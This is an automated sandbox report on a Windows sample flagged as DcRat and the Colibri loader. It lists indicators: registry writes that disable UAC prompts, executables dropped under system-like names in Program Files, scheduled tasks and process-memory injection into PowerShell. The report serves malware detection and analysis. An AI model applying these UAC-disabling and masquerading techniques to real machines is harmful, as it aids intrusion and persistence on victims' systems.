Malware Analysis Report

2024-11-13 16:51

Sample ID 241108-sqhwgavcnm
Target f61d38016d33a0e5e85b32545e15f8deb3c3a9313492ee05ac4cfb4a9c29bcafN
SHA256 f61d38016d33a0e5e85b32545e15f8deb3c3a9313492ee05ac4cfb4a9c29bcaf
Tags dcrat evasion execution infostealer rat trojan colibri build1 discovery loader
Score 10/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

Score 10/10

SHA256 f61d38016d33a0e5e85b32545e15f8deb3c3a9313492ee05ac4cfb4a9c29bcaf

Threat Level: Known bad

The file f61d38016d33a0e5e85b32545e15f8deb3c3a9313492ee05ac4cfb4a9c29bcafN was found to be: Known bad.

Malicious Activity Summary

dcrat evasion execution infostealer rat trojan colibri build1 discovery loader

DcRat

Colibri Loader

UAC bypass

Dcrat family

Colibri family

Process spawned unexpected child process

DCRat payload

Command and Scripting Interpreter: PowerShell

Executes dropped EXE

Checks computer location settings

Checks whether UAC is enabled

Suspicious use of SetThreadContext

Drops file in Program Files directory

Drops file in Windows directory

Unsigned PE

Enumerates physical storage devices

System Location Discovery: System Language Discovery

Suspicious behavior: EnumeratesProcesses

Modifies registry class

Suspicious use of AdjustPrivilegeToken

Uses Task Scheduler COM API

Suspicious use of WriteProcessMemory

Scheduled Task/Job: Scheduled Task

System policy modification

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2024-11-08 15:19

Signatures

Unsigned PE

Description Indicator Process Target
N/A N/A N/A N/A

Analysis: behavioral1

Detonation Overview

Submitted

2024-11-08 15:19

Reported

2024-11-08 15:21

Platform

win7-20241010-en

Max time kernel

119s

Max time network

114s

Command Line

"C:\Users\Admin\AppData\Local\Temp\f61d38016d33a0e5e85b32545e15f8deb3c3a9313492ee05ac4cfb4a9c29bcafN.exe"

Signatures

DcRat

rat infostealer dcrat

Dcrat family

dcrat

Process spawned unexpected child process

Description Indicator Process Target
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe

UAC bypass

evasion trojan

Description Indicator Process Target
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" C:\Program Files\Windows Journal\ja-JP\smss.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" C:\Program Files\Windows Journal\ja-JP\smss.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0" C:\Program Files\Windows Journal\ja-JP\smss.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\PromptOnSecureDesktop = "0" C:\Program Files\Windows Journal\ja-JP\smss.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\PromptOnSecureDesktop = "0" C:\Program Files\Windows Journal\ja-JP\smss.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" C:\Program Files\Windows Journal\ja-JP\smss.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" C:\Program Files\Windows Journal\ja-JP\smss.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0" C:\Program Files\Windows Journal\ja-JP\smss.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" C:\Program Files\Windows Journal\ja-JP\smss.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" C:\Users\Admin\AppData\Local\Temp\f61d38016d33a0e5e85b32545e15f8deb3c3a9313492ee05ac4cfb4a9c29bcafN.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\PromptOnSecureDesktop = "0" C:\Users\Admin\AppData\Local\Temp\f61d38016d33a0e5e85b32545e15f8deb3c3a9313492ee05ac4cfb4a9c29bcafN.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0" C:\Program Files\Windows Journal\ja-JP\smss.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0" C:\Program Files\Windows Journal\ja-JP\smss.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\PromptOnSecureDesktop = "0" C:\Program Files\Windows Journal\ja-JP\smss.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0" C:\Program Files\Windows Journal\ja-JP\smss.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\PromptOnSecureDesktop = "0" C:\Program Files\Windows Journal\ja-JP\smss.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0" C:\Program Files\Windows Journal\ja-JP\smss.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0" C:\Users\Admin\AppData\Local\Temp\f61d38016d33a0e5e85b32545e15f8deb3c3a9313492ee05ac4cfb4a9c29bcafN.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" C:\Program Files\Windows Journal\ja-JP\smss.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\PromptOnSecureDesktop = "0" C:\Program Files\Windows Journal\ja-JP\smss.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0" C:\Program Files\Windows Journal\ja-JP\smss.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" C:\Program Files\Windows Journal\ja-JP\smss.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\PromptOnSecureDesktop = "0" C:\Program Files\Windows Journal\ja-JP\smss.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" C:\Program Files\Windows Journal\ja-JP\smss.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\PromptOnSecureDesktop = "0" C:\Program Files\Windows Journal\ja-JP\smss.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0" C:\Program Files\Windows Journal\ja-JP\smss.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\PromptOnSecureDesktop = "0" C:\Program Files\Windows Journal\ja-JP\smss.exe N/A

DCRat payload

rat

Description Indicator Process Target
N/A N/A N/A N/A

Checks whether UAC is enabled

evasion trojan

Description Indicator Process Target
Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA C:\Program Files\Windows Journal\ja-JP\smss.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" C:\Program Files\Windows Journal\ja-JP\smss.exe N/A
Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA C:\Users\Admin\AppData\Local\Temp\f61d38016d33a0e5e85b32545e15f8deb3c3a9313492ee05ac4cfb4a9c29bcafN.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" C:\Program Files\Windows Journal\ja-JP\smss.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" C:\Program Files\Windows Journal\ja-JP\smss.exe N/A
Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA C:\Program Files\Windows Journal\ja-JP\smss.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" C:\Program Files\Windows Journal\ja-JP\smss.exe N/A
Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA C:\Program Files\Windows Journal\ja-JP\smss.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" C:\Program Files\Windows Journal\ja-JP\smss.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" C:\Users\Admin\AppData\Local\Temp\f61d38016d33a0e5e85b32545e15f8deb3c3a9313492ee05ac4cfb4a9c29bcafN.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" C:\Program Files\Windows Journal\ja-JP\smss.exe N/A
Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA C:\Program Files\Windows Journal\ja-JP\smss.exe N/A
Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA C:\Program Files\Windows Journal\ja-JP\smss.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" C:\Program Files\Windows Journal\ja-JP\smss.exe N/A
Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA C:\Program Files\Windows Journal\ja-JP\smss.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" C:\Program Files\Windows Journal\ja-JP\smss.exe N/A
Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA C:\Program Files\Windows Journal\ja-JP\smss.exe N/A
Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA C:\Program Files\Windows Journal\ja-JP\smss.exe N/A

Drops file in Program Files directory

Description Indicator Process Target
File opened for modification C:\Program Files (x86)\Windows Sidebar\Gadgets\RCXB6F5.tmp C:\Users\Admin\AppData\Local\Temp\f61d38016d33a0e5e85b32545e15f8deb3c3a9313492ee05ac4cfb4a9c29bcafN.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft SQL Server Compact Edition\v3.5\Desktop\csrss.exe C:\Users\Admin\AppData\Local\Temp\f61d38016d33a0e5e85b32545e15f8deb3c3a9313492ee05ac4cfb4a9c29bcafN.exe N/A
File created C:\Program Files\Windows Photo Viewer\en-US\lsass.exe C:\Users\Admin\AppData\Local\Temp\f61d38016d33a0e5e85b32545e15f8deb3c3a9313492ee05ac4cfb4a9c29bcafN.exe N/A
File created C:\Program Files\Windows Photo Viewer\en-US\6203df4a6bafc7 C:\Users\Admin\AppData\Local\Temp\f61d38016d33a0e5e85b32545e15f8deb3c3a9313492ee05ac4cfb4a9c29bcafN.exe N/A
File opened for modification C:\Program Files\Windows Photo Viewer\en-US\RCXBDFA.tmp C:\Users\Admin\AppData\Local\Temp\f61d38016d33a0e5e85b32545e15f8deb3c3a9313492ee05ac4cfb4a9c29bcafN.exe N/A
File opened for modification C:\Program Files\Windows Photo Viewer\en-US\lsass.exe C:\Users\Admin\AppData\Local\Temp\f61d38016d33a0e5e85b32545e15f8deb3c3a9313492ee05ac4cfb4a9c29bcafN.exe N/A
File opened for modification C:\Program Files (x86)\Windows Photo Viewer\fr-FR\explorer.exe C:\Users\Admin\AppData\Local\Temp\f61d38016d33a0e5e85b32545e15f8deb3c3a9313492ee05ac4cfb4a9c29bcafN.exe N/A
File opened for modification C:\Program Files\Windows Journal\ja-JP\smss.exe C:\Users\Admin\AppData\Local\Temp\f61d38016d33a0e5e85b32545e15f8deb3c3a9313492ee05ac4cfb4a9c29bcafN.exe N/A
File created C:\Program Files (x86)\Microsoft SQL Server Compact Edition\v3.5\Desktop\886983d96e3d3e C:\Users\Admin\AppData\Local\Temp\f61d38016d33a0e5e85b32545e15f8deb3c3a9313492ee05ac4cfb4a9c29bcafN.exe N/A
File opened for modification C:\Program Files (x86)\Common Files\microsoft shared\Portal\1033\RCXB947.tmp C:\Users\Admin\AppData\Local\Temp\f61d38016d33a0e5e85b32545e15f8deb3c3a9313492ee05ac4cfb4a9c29bcafN.exe N/A
File created C:\Program Files (x86)\Windows Sidebar\Gadgets\b75386f1303e64 C:\Users\Admin\AppData\Local\Temp\f61d38016d33a0e5e85b32545e15f8deb3c3a9313492ee05ac4cfb4a9c29bcafN.exe N/A
File created C:\Program Files (x86)\Windows Photo Viewer\fr-FR\explorer.exe C:\Users\Admin\AppData\Local\Temp\f61d38016d33a0e5e85b32545e15f8deb3c3a9313492ee05ac4cfb4a9c29bcafN.exe N/A
File opened for modification C:\Program Files\Windows Journal\ja-JP\RCXC53E.tmp C:\Users\Admin\AppData\Local\Temp\f61d38016d33a0e5e85b32545e15f8deb3c3a9313492ee05ac4cfb4a9c29bcafN.exe N/A
File created C:\Program Files (x86)\Windows Sidebar\Gadgets\taskhost.exe C:\Users\Admin\AppData\Local\Temp\f61d38016d33a0e5e85b32545e15f8deb3c3a9313492ee05ac4cfb4a9c29bcafN.exe N/A
File created C:\Program Files (x86)\Microsoft Synchronization Services\cc11b995f2a76d C:\Users\Admin\AppData\Local\Temp\f61d38016d33a0e5e85b32545e15f8deb3c3a9313492ee05ac4cfb4a9c29bcafN.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft SQL Server Compact Edition\v3.5\Desktop\RCXB494.tmp C:\Users\Admin\AppData\Local\Temp\f61d38016d33a0e5e85b32545e15f8deb3c3a9313492ee05ac4cfb4a9c29bcafN.exe N/A
File opened for modification C:\Program Files (x86)\Windows Sidebar\Gadgets\taskhost.exe C:\Users\Admin\AppData\Local\Temp\f61d38016d33a0e5e85b32545e15f8deb3c3a9313492ee05ac4cfb4a9c29bcafN.exe N/A
File opened for modification C:\Program Files (x86)\Windows Photo Viewer\fr-FR\RCXC01D.tmp C:\Users\Admin\AppData\Local\Temp\f61d38016d33a0e5e85b32545e15f8deb3c3a9313492ee05ac4cfb4a9c29bcafN.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Synchronization Services\winlogon.exe C:\Users\Admin\AppData\Local\Temp\f61d38016d33a0e5e85b32545e15f8deb3c3a9313492ee05ac4cfb4a9c29bcafN.exe N/A
File created C:\Program Files (x86)\Windows Photo Viewer\fr-FR\7a0fd90576e088 C:\Users\Admin\AppData\Local\Temp\f61d38016d33a0e5e85b32545e15f8deb3c3a9313492ee05ac4cfb4a9c29bcafN.exe N/A
File created C:\Program Files\Windows Journal\ja-JP\smss.exe C:\Users\Admin\AppData\Local\Temp\f61d38016d33a0e5e85b32545e15f8deb3c3a9313492ee05ac4cfb4a9c29bcafN.exe N/A
File created C:\Program Files\Windows Journal\ja-JP\69ddcba757bf72 C:\Users\Admin\AppData\Local\Temp\f61d38016d33a0e5e85b32545e15f8deb3c3a9313492ee05ac4cfb4a9c29bcafN.exe N/A
File created C:\Program Files (x86)\Microsoft SQL Server Compact Edition\v3.5\Desktop\csrss.exe C:\Users\Admin\AppData\Local\Temp\f61d38016d33a0e5e85b32545e15f8deb3c3a9313492ee05ac4cfb4a9c29bcafN.exe N/A
File created C:\Program Files (x86)\Common Files\microsoft shared\Portal\1033\f61d38016d33a0e5e85b32545e15f8deb3c3a9313492ee05ac4cfb4a9c29bcafN.exe C:\Users\Admin\AppData\Local\Temp\f61d38016d33a0e5e85b32545e15f8deb3c3a9313492ee05ac4cfb4a9c29bcafN.exe N/A
File created C:\Program Files (x86)\Common Files\microsoft shared\Portal\1033\e15c75ee0b3582 C:\Users\Admin\AppData\Local\Temp\f61d38016d33a0e5e85b32545e15f8deb3c3a9313492ee05ac4cfb4a9c29bcafN.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Synchronization Services\RCXB02F.tmp C:\Users\Admin\AppData\Local\Temp\f61d38016d33a0e5e85b32545e15f8deb3c3a9313492ee05ac4cfb4a9c29bcafN.exe N/A
File opened for modification C:\Program Files (x86)\Common Files\microsoft shared\Portal\1033\f61d38016d33a0e5e85b32545e15f8deb3c3a9313492ee05ac4cfb4a9c29bcafN.exe C:\Users\Admin\AppData\Local\Temp\f61d38016d33a0e5e85b32545e15f8deb3c3a9313492ee05ac4cfb4a9c29bcafN.exe N/A
File created C:\Program Files (x86)\Microsoft Synchronization Services\winlogon.exe C:\Users\Admin\AppData\Local\Temp\f61d38016d33a0e5e85b32545e15f8deb3c3a9313492ee05ac4cfb4a9c29bcafN.exe N/A

Enumerates physical storage devices

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\f61d38016d33a0e5e85b32545e15f8deb3c3a9313492ee05ac4cfb4a9c29bcafN.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\f61d38016d33a0e5e85b32545e15f8deb3c3a9313492ee05ac4cfb4a9c29bcafN.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\f61d38016d33a0e5e85b32545e15f8deb3c3a9313492ee05ac4cfb4a9c29bcafN.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\f61d38016d33a0e5e85b32545e15f8deb3c3a9313492ee05ac4cfb4a9c29bcafN.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\f61d38016d33a0e5e85b32545e15f8deb3c3a9313492ee05ac4cfb4a9c29bcafN.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\f61d38016d33a0e5e85b32545e15f8deb3c3a9313492ee05ac4cfb4a9c29bcafN.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\f61d38016d33a0e5e85b32545e15f8deb3c3a9313492ee05ac4cfb4a9c29bcafN.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\f61d38016d33a0e5e85b32545e15f8deb3c3a9313492ee05ac4cfb4a9c29bcafN.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\f61d38016d33a0e5e85b32545e15f8deb3c3a9313492ee05ac4cfb4a9c29bcafN.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Program Files\Windows Journal\ja-JP\smss.exe N/A
N/A N/A C:\Program Files\Windows Journal\ja-JP\smss.exe N/A
N/A N/A C:\Program Files\Windows Journal\ja-JP\smss.exe N/A
N/A N/A C:\Program Files\Windows Journal\ja-JP\smss.exe N/A
N/A N/A C:\Program Files\Windows Journal\ja-JP\smss.exe N/A
N/A N/A C:\Program Files\Windows Journal\ja-JP\smss.exe N/A
N/A N/A C:\Program Files\Windows Journal\ja-JP\smss.exe N/A
N/A N/A C:\Program Files\Windows Journal\ja-JP\smss.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\f61d38016d33a0e5e85b32545e15f8deb3c3a9313492ee05ac4cfb4a9c29bcafN.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Program Files\Windows Journal\ja-JP\smss.exe N/A
Token: SeDebugPrivilege N/A C:\Program Files\Windows Journal\ja-JP\smss.exe N/A
Token: SeDebugPrivilege N/A C:\Program Files\Windows Journal\ja-JP\smss.exe N/A
Token: SeDebugPrivilege N/A C:\Program Files\Windows Journal\ja-JP\smss.exe N/A
Token: SeDebugPrivilege N/A C:\Program Files\Windows Journal\ja-JP\smss.exe N/A
Token: SeDebugPrivilege N/A C:\Program Files\Windows Journal\ja-JP\smss.exe N/A
Token: SeDebugPrivilege N/A C:\Program Files\Windows Journal\ja-JP\smss.exe N/A
Token: SeDebugPrivilege N/A C:\Program Files\Windows Journal\ja-JP\smss.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 1740 wrote to memory of 2892 N/A C:\Users\Admin\AppData\Local\Temp\f61d38016d33a0e5e85b32545e15f8deb3c3a9313492ee05ac4cfb4a9c29bcafN.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1740 wrote to memory of 2892 N/A C:\Users\Admin\AppData\Local\Temp\f61d38016d33a0e5e85b32545e15f8deb3c3a9313492ee05ac4cfb4a9c29bcafN.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1740 wrote to memory of 2892 N/A C:\Users\Admin\AppData\Local\Temp\f61d38016d33a0e5e85b32545e15f8deb3c3a9313492ee05ac4cfb4a9c29bcafN.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1740 wrote to memory of 2376 N/A C:\Users\Admin\AppData\Local\Temp\f61d38016d33a0e5e85b32545e15f8deb3c3a9313492ee05ac4cfb4a9c29bcafN.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1740 wrote to memory of 2376 N/A C:\Users\Admin\AppData\Local\Temp\f61d38016d33a0e5e85b32545e15f8deb3c3a9313492ee05ac4cfb4a9c29bcafN.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1740 wrote to memory of 2376 N/A C:\Users\Admin\AppData\Local\Temp\f61d38016d33a0e5e85b32545e15f8deb3c3a9313492ee05ac4cfb4a9c29bcafN.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1740 wrote to memory of 1748 N/A C:\Users\Admin\AppData\Local\Temp\f61d38016d33a0e5e85b32545e15f8deb3c3a9313492ee05ac4cfb4a9c29bcafN.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1740 wrote to memory of 1748 N/A C:\Users\Admin\AppData\Local\Temp\f61d38016d33a0e5e85b32545e15f8deb3c3a9313492ee05ac4cfb4a9c29bcafN.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1740 wrote to memory of 1748 N/A C:\Users\Admin\AppData\Local\Temp\f61d38016d33a0e5e85b32545e15f8deb3c3a9313492ee05ac4cfb4a9c29bcafN.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1740 wrote to memory of 544 N/A C:\Users\Admin\AppData\Local\Temp\f61d38016d33a0e5e85b32545e15f8deb3c3a9313492ee05ac4cfb4a9c29bcafN.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1740 wrote to memory of 544 N/A C:\Users\Admin\AppData\Local\Temp\f61d38016d33a0e5e85b32545e15f8deb3c3a9313492ee05ac4cfb4a9c29bcafN.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1740 wrote to memory of 544 N/A C:\Users\Admin\AppData\Local\Temp\f61d38016d33a0e5e85b32545e15f8deb3c3a9313492ee05ac4cfb4a9c29bcafN.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1740 wrote to memory of 2608 N/A C:\Users\Admin\AppData\Local\Temp\f61d38016d33a0e5e85b32545e15f8deb3c3a9313492ee05ac4cfb4a9c29bcafN.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
